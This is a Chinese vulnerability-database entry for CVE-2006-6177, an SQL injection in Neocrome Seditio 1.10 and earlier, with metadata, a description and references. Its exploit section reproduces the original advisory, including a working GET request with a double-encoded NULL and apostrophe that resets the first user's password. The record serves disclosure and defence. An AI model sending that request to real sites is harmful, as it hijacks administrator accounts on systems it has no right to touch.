Neocrome Seditio users.profile.inc.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111632 漏洞类型 SQL注入
发布时间 2006-11-21 更新时间 2006-11-30
CVE编号 CVE-2006-6177 CNNVD-ID CNNVD-200611-489
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2820
https://www.securityfocus.com/bid/77908
https://cxsecurity.com/issue/WLB-2006120003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-489
|漏洞详情
NeocromeSeditio1.10及更早版本中的system/core/users/users.profile.inc.php存在SQL注入漏洞,远程认证用户可以通过一个传给users.php的以有效文件名开始的双url编码id参数来执行任意SQL命令,如通过在"default.gif"之后跟随一个编码NULL和'(撇号)(%2500%2527)。
|漏洞EXP
Seditio <= 1.10 Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
Original advisory can be found at: http://www.nukedx.com/?viewdoc=52
----
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to 123456 
The XVALUE is comes with your avatarselect link it's special to everyuser in Seditio.
For using this vulnerability you must be logged in to Seditio... 

# nukedx.com [2006-11-21]

# milw0rm.com [2006-11-21]
|受影响的产品
Neocrome Seditio 1.10
|参考资料

来源:VUPEN
名称:ADV-2006-4668
链接:http://www.frsirt.com/english/advisories/2006/4668
来源:SECUNIA
名称:23054
链接:http://secunia.com/advisories/23054
来源:BUGTRAQ
名称:20061122Advisory:Seditio<=1.10RemoteSQLInjectionVulnerability.
链接:http://www.securityfocus.com/archive/1/archive/1/452269/100/100/threaded
来源:MISC
链接:http://www.nukedx.com/?viewdoc=52
来源:MISC
链接:http://www.nukedx.com/?getxpl=52
来源:www.neocrome.net
链接:http://www.neocrome.net/page.php?id=2233
来源:XF
名称:seditio-users-sql-injection(30466)
链接:http://xforce.iss.net/xforce/xfdb/30466
来源:SREASON
名称:1931
链接:http://securityreason.com/securityalert/1931